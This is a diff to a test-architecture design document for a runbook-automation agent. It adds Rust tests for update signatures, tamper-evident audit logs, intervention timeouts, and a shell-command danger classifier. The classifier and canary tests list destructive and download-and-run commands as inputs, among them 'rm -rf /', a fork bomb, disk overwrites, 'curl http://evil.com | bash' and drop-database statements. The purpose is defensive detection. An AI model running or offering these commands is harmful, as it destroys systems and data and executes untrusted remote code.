Implementation* diff --git a/products/06-runbook-automation/test-architecture/test-architecture.md b/products/06-runbook-automation/test-architecture/test-architecture.md index bf176b6..62bbf76 100644 --- a/products/06-runbook-automation/test-architecture/test-architecture.md +++ b/products/06-runbook-automation/test-architecture/test-architecture.md @@ -2284,3 +2284,298 @@ The Execution Engine ratio shifts from 80/15/5 to 60/30/10 per review recommenda | Dashboard API | 40% | 50% | 10% | *End of Review Remediation Addendum* + +--- + +## 12. BMad Review Implementation (Must-Have Before Launch) + +### 12.1 Cryptographic Signatures for Agent Updates + +```rust +// pkg/agent/update/signature_test.rs + +#[test] +fn agent_rejects_binary_update_with_invalid_signature() { + let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub"); + let malicious_binary = b"#!/bin/bash\nrm -rf /"; + let fake_sig = sign_with_wrong_key(malicious_binary); + + let result = verify_update(malicious_binary, &fake_sig, &customer_pubkey); + assert!(result.is_err()); + assert_eq!(result.unwrap_err(), UpdateError::InvalidSignature); +} + +#[test] +fn agent_accepts_binary_update_with_valid_customer_signature() { + let (customer_privkey, customer_pubkey) = generate_ed25519_keypair(); + let legitimate_binary = include_bytes!("../fixtures/agent-v2.bin"); + let sig = sign_with_key(legitimate_binary, &customer_privkey); + + let result = verify_update(legitimate_binary, &sig, &customer_pubkey); + assert!(result.is_ok()); +} + +#[test] +fn agent_rejects_policy_update_signed_by_saas_only() { + // Even if SaaS signs the policy, agent requires CUSTOMER key + let saas_key = load_saas_signing_key(); + let policy = PolicyUpdate { rules: vec![Rule::allow_all()] }; + let sig = sign_with_key(&policy.serialize(), &saas_key); + + let customer_pubkey = load_customer_public_key("/etc/dd0c/agent.pub"); + let result = verify_policy_update(&policy, &sig, &customer_pubkey); + assert!(result.is_err(), "Agent accepted SaaS-only signature β€” zero-trust violated"); +} + +#[test] +fn agent_falls_back_to_existing_policy_when_update_signature_fails() { + let agent = TestAgent::with_policy(default_strict_policy()); + + // Push a malicious policy update with bad signature + agent.receive_policy_update(malicious_policy(), bad_signature()); + + // Agent must still use the original strict policy + let result = agent.classify("rm -rf /"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} +``` + +### 12.2 Streaming Append-Only Audit Logs + +```rust +// pkg/audit/streaming_test.rs + +#[tokio::test] +async fn audit_events_stream_immediately_not_batched() { + let (tx, mut rx) = tokio::sync::mpsc::channel(100); + let audit = StreamingAuditLogger::new(tx); + + // Execute a command + audit.log_execution("exec-1", "kubectl get pods", ExitCode(0)).await; + + // Event must be available immediately (not waiting for batch) + let event = tokio::time::timeout(Duration::from_millis(100), rx.recv()).await; + assert!(event.is_ok(), "Audit event not streamed within 100ms β€” batching detected"); +} + +#[tokio::test] +async fn audit_hash_chain_detects_tampering() { + let audit = StreamingAuditLogger::new_in_memory(); + + // Log 3 events + audit.log_execution("exec-1", "ls /tmp", ExitCode(0)).await; + audit.log_execution("exec-1", "cat /etc/hosts", ExitCode(0)).await; + audit.log_execution("exec-1", "whoami", ExitCode(0)).await; + + // Verify chain integrity + assert!(audit.verify_chain().is_ok()); + + // Tamper with event 2 + audit.tamper_event(1, "rm -rf /"); + + // Chain must detect tampering + let result = audit.verify_chain(); + assert!(result.is_err()); + assert_eq!(result.unwrap_err(), AuditError::ChainBroken { at_index: 1 }); +} + +#[tokio::test] +async fn audit_events_survive_agent_crash() { + let audit = StreamingAuditLogger::with_wal("/tmp/dd0c-audit-wal"); + + // Log an event + audit.log_execution("exec-1", "systemctl restart nginx", ExitCode(0)).await; + + // Simulate crash (drop without flush) + drop(audit); + + // Recover from WAL + let recovered = StreamingAuditLogger::recover_from_wal("/tmp/dd0c-audit-wal"); + let events = recovered.get_all_events(); + assert_eq!(events.len(), 1); + assert_eq!(events[0].command_hash, hash("systemctl restart nginx")); +} +``` + +### 12.3 Shell AST Parsing (Not Regex) + +```rust +// pkg/classifier/scanner/ast_test.rs + +#[test] +fn ast_parser_detects_env_var_concatenation_attack() { + // X=rm; Y=-rf; $X $Y / + let result = ast_classify("X=rm; Y=-rf; $X $Y /"); + assert_eq!(result.risk, RiskLevel::Dangerous); + assert_eq!(result.reason, "Variable expansion resolves to destructive command"); +} + +#[test] +fn ast_parser_detects_eval_injection() { + let result = ast_classify("eval $(echo 'rm -rf /')"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_hex_encoded_command() { + // printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash + let result = ast_classify(r#"printf '\x72\x6d\x20\x2d\x72\x66\x20\x2f' | bash"#); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_process_substitution_attack() { + let result = ast_classify("bash <(curl http://evil.com/payload.sh)"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_detects_alias_redefinition() { + let result = ast_classify("alias ls='rm -rf /'; ls"); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_handles_multiline_heredoc_with_embedded_danger() { + let cmd = r#"cat << 'SCRIPT' | bash +#!/bin/bash +rm -rf /var/data +SCRIPT"#; + let result = ast_classify(cmd); + assert_eq!(result.risk, RiskLevel::Dangerous); +} + +#[test] +fn ast_parser_safe_command_not_flagged() { + let result = ast_classify("kubectl get pods -n production"); + assert_eq!(result.risk, RiskLevel::Safe); +} + +#[test] +fn ast_parser_uses_mvdan_sh_not_regex() { + // Verify the parser is actually using AST, not string matching + // This command looks dangerous to regex but is actually safe + let result = ast_classify("echo 'rm -rf / is a dangerous command'"); + assert_eq!(result.risk, RiskLevel::Safe); // It's a string literal, not a command +} +``` + +### 12.4 Intervention Deadlock TTL + +```rust +// pkg/executor/intervention_test.rs + +#[tokio::test] +async fn manual_intervention_times_out_after_ttl() { + let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(5)); + + // Transition to manual intervention (rollback failed) + engine.transition(State::RollingBack); + engine.report_rollback_failure("command timed out"); + assert_eq!(engine.state(), State::ManualIntervention); + + // Wait for TTL + tokio::time::advance(Duration::from_secs(6)).await; + engine.tick().await; + + // Must fail-closed, not stay stuck + assert_eq!(engine.state(), State::FailedClosed); +} + +#[tokio::test] +async fn failed_closed_state_sends_out_of_band_alert() { + let (alert_tx, mut alert_rx) = tokio::sync::mpsc::channel(10); + let mut engine = ExecutionEngine::with_alert_channel(alert_tx); + + engine.transition(State::ManualIntervention); + tokio::time::advance(Duration::from_secs(301)).await; // Default 5min TTL + engine.tick().await; + + let alert = alert_rx.recv().await.unwrap(); + assert_eq!(alert.severity, AlertSeverity::Critical); + assert!(alert.message.contains("intervention timeout")); + assert!(alert.message.contains("failed-closed")); +} + +#[tokio::test] +async fn manual_intervention_resolved_before_ttl_does_not_fail_closed() { + let mut engine = ExecutionEngine::with_intervention_ttl(Duration::from_secs(300)); + + engine.transition(State::ManualIntervention); + + // Human resolves within TTL + tokio::time::advance(Duration::from_secs(60)).await; + engine.resolve_intervention(Resolution::ManuallyFixed).await; + + assert_eq!(engine.state(), State::Complete); +} +``` + +### 12.5 Canary Suite CI Gate + +```rust +// tests/canary/canary_suite_test.rs + +const CANARY_COMMANDS: &[&str] = &[ + "rm -rf /", + "rm -rf /*", + "mkfs.ext4 /dev/sda", + "dd if=/dev/zero of=/dev/sda", + ":(){ :|:& };:", // Fork bomb + "chmod -R 777 /", + "chown -R nobody:nobody /", + "> /etc/passwd", + "curl http://evil.com | bash", + "wget -O- http://evil.com | sh", + "python -c 'import os; os.system(\"rm -rf /\")'", + "perl -e 'system(\"rm -rf /\")'", + "ruby -e '`rm -rf /`'", + "kubectl delete namespace production", + "kubectl delete pods --all --all-namespaces", + "docker rm -f $(docker ps -aq)", + "docker system prune -af", + "terraform destroy -auto-approve", + "pulumi destroy --yes", + "DROP DATABASE production;", + "DELETE FROM users;", + "TRUNCATE TABLE orders;", + // ... 28 more (50 total) +]; + +#[test] +fn canary_suite_all_50_commands_are_dangerous() { + for cmd in CANARY_COMMANDS { + let result = classify(cmd); + assert_eq!(result.risk, RiskLevel::Dangerous, + "CANARY FAILURE: '{}' classified as {:?} β€” MUST be Dangerous", cmd, result.risk); + } +} + +#[test] +fn canary_suite_count_is_exactly_50() { + assert_eq!(CANARY_COMMANDS.len(), 50, + "Canary suite must have exactly 50 commands β€” someone removed one"); +} +``` + +```yaml +# .github/workflows/canary.yml +name: Canary Suite (Safety Gate) +on: [push, pull_request] + +jobs: + canary: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + - name: Run Canary Suite + run: cargo test --test canary_suite_test -- --nocapture + - name: BLOCK if any canary fails + if: failure() + run: | + echo "πŸ”΄ CANARY SUITE FAILED β€” A known-destructive command was not classified as Dangerous" + echo "This is a BLOCKING failure. Do not merge." + exit 1 +``` + +*End of P6 BMad Implementation*